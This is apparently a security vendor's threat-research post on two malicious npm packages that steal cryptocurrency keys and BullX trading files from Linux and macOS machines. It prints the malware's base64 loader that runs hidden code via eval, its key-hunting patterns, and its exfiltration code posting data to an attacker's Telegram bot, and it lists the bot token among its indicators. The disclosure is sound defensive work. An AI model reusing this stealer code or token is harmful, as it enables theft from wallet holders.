Malicious npm Packages Use Telegram to Exfiltrate BullX Credentials

Is Your Cryptocurrency Safe, or Is an npm Trojan Silently Emptying Your Wallets?

Socket’s Threat Research Team uncovered two malicious npm packages pumptoolforvolumeandcomment and its wrapper [debugdogs](<https://socket.dev/npm/package/debugdogs/overview/1.0.0>) published by the same threat actor under the npm alias olumideyo. The loader in pumptoolforvolumeandcomment decodes an obfuscated payload that hunts for Base58-encoded cryptocurrency keys, wallet files, and “BullX” trading data across user directories on Linux and macOS systems, then exfiltrates sensitive data via a Telegram bot. Meanwhile, debugdogs simply invokes pumptoolforvolumeandcomment, making it a convenient secondary infection payload. This highly targeted attack can empty wallets and expose sensitive credentials and trading data in seconds.

Why "BullX"?#

BullX is a cryptocurrency trading platform popular among crypto traders for its speed and efficiency in trading newly launched coins. The malicious actor explicitly target its users to exfiltrate sensitive credentials and trading information.

BullX trading platform specifically targeted by olumideyo

Initial Loader (index.js):

const fs = require('fs');
const path = require('path');

const base64Encoded = fs.readFileSync(path.join(__dirname, 'parts.txt'), 'utf8');
const decodedScript = Buffer.from(base64Encoded, 'base64').toString('utf8');

eval(decodedScript); // Executes the hidden malicious payload

Socket’s AI Scanners flagged the malicious npm package pumptoolforvolumeandcomment due to its obfuscated payload.

Socket’s AI scanner flagging the malicious npm package

Technical Analysis of the Decoded Payload#

The base64-decoded malicious payload found in the parts.txt, revealed advanced file-stealing capabilities, targeting cryptocurrency keys and specifically BullX-related files:

Key Functionalities:

• Sensitive Directory Enumeration: Actively searches critical user directories:
  • This malware is built for UNIX-style environments it will run on both Linux (using /media mounts) and macOS (leveraging the /Volumes mount point). It won’t work on Windows out of the box, since it only looks in POSIX paths like ~/Documents, /media, and /Volumes.
• File Targeting: Looks for potentially sensitive files (.txt, .env, .docs, .log, .cfg, .ini).
• Credential and Key Harvesting: Searches for patterns indicative of cryptocurrency wallet keys:

PATTERN_NAME_1 = /\b[123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz]{58,}\b/g;
PATTERN_NAME_2 = /\b[123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz]{43,57}\b/g;
PATTERN_NAME_3 = /\b[123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz]{58,}\b:\b[123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz]{43,}\b/g;

The regular expressions used by the malware specifically target Base58-encoded strings commonly used in cryptocurrency wallets and private keys, indicating the intent to steal crypto-related credentials. This targeted approach increases the risk of financial loss and unauthorized access to crypto assets.

• Explicitly Targeting "BullX" Users: Specifically searches and collects contents from any file containing "BullX":

if (file_path.includes('BullX') && file_path.endsWith('.txt')) {
    bullX_contents.push({ file: file_path, content });
}

Automated Exfiltration via Telegram#

The malware compiles discovered secrets into a structured JSON file (fss.json) and uploads this file using an attacker-controlled Telegram bot, enabling stealthy and real-time exfiltration:

const form = new FormData();
form.append('chat_id', chat_id);
form.append('document', fs.createReadStream(filePath));
const bot_token = "7477833207:<REDACTED>";
const chat_id = "-1002402864775";

await axios.post(`https://api.telegram.org/bot${bot_token}/sendDocument`, form);



 if (Object.values(keys_grouped).some(group => group.length > 0) || bullX_contents.length > 0) {
        const jsonMessage = format_keys_message();
        const filePath = path.join(customDir, 'fss.json'); // Save the JSON in the custom folder
        save_json_to_file(jsonMessage, filePath);
        send_json_file_to_telegram(filePath);

This setup allows the threat actor to receive instant updates and credentials, increasing the risk of rapid and targeted attacks against BullX traders and crypto wallet holders.

Secondary Infection (debugdogs) Identified:#

Upon deeper investigation, we discovered another npm package by the same malicious author named debugdogs, containing minimal functionality:

const pumptool = require('pumptoolforvolumeandcomment');
console.log(pumptool());

By pointing directly at pumptoolforvolumeandcomment, the author ensures that anyone installing debugdogs will automatically pull in and execute the real payload. This “wrapper” pattern doubles down on the main attack, making it easier to spread under multiple names without changing the core malicious code.

Malicious author olumideyo's npm profile (registration email bomakingg@gmail[.]com)

Real-World Impact: Cryptocurrency Credentials at Stake#

The targeted nature of this attack places affected users at high risk:

• Crypto Wallet Theft: Immediate financial losses due to wallet compromise.
• BullX Account Breach: Unauthorized trading, withdrawals, or sensitive user data compromise.
• Extended Persistence: Continuous and stealthy access to user and organizational data.

This attack highlights the urgent need for better scrutiny of npm packages in cryptocurrency and trading-related environments.

Continuous Defense with Socket’s Security Suite#

The targeted discovery of pumptoolforvolumeandcomment and related packages (debugdogs) underscores a growing and dangerous trend in software supply chain attacks targeting cryptocurrency traders and platforms like BullX. Attackers specifically exploit trust in developer-friendly tools and communication channels like Telegram, aiming for high-value credentials.

Developers and cryptocurrency users must adopt rigorous security practices to combat these threats, including automated dependency scanning, runtime behavior monitoring, and robust credentials management.

Integrating Socket’s security tools early in your workflow significantly mitigates such supply-chain attacks, protecting critical data from compromise and theft.

• Socket GitHub App: Automated real-time security analysis of dependencies.
• Socket CLI Tool: Inspect and detect anomalies during npm builds and installations.
• Browser Extension: Scans npm package pages in your browser as you browse, flags suspicious or malicious code snippets in real-time, and warns you before you install or download a risky package.

Related Research: Telegram Attacks#

Telegram is consistently being used by threat actors to exfiltrate sensitive data due to its ease of use and low barrier of entry: it is trivial to spin up a Telegram bot in minutes and start receiving exfiltrated data.

• npm Malware Targets Telegram Bot Developers
• Silent Discord Raider: 'Blank Grabber’ Python Package Steals Info from Discord and Telegram

Indicators of Compromise (IOCs)#

Malicious npm Packages:

• pumptoolforvolumeandcomment
• debugdogs

Threat Actor Identifiers:

• olumideyo
• gojothenerd - name alias
• bomakingg@gmail[.]com - email address

Telegram Infrastructure:

• Bot Token: 7477833207:AAGAxGtCoo2NXFD62dUV9DdT3HpK6d2PnHI
• Chat ID: 1002402864775

MITRE ATT&CK Techniques#

• T1552 — Unsecured Credentials
• T1567.002 — Exfiltration over Web Service
• T1027 — Obfuscated Files or Information
• T1059.007 — Command and Scripting Interpreter: JavaScript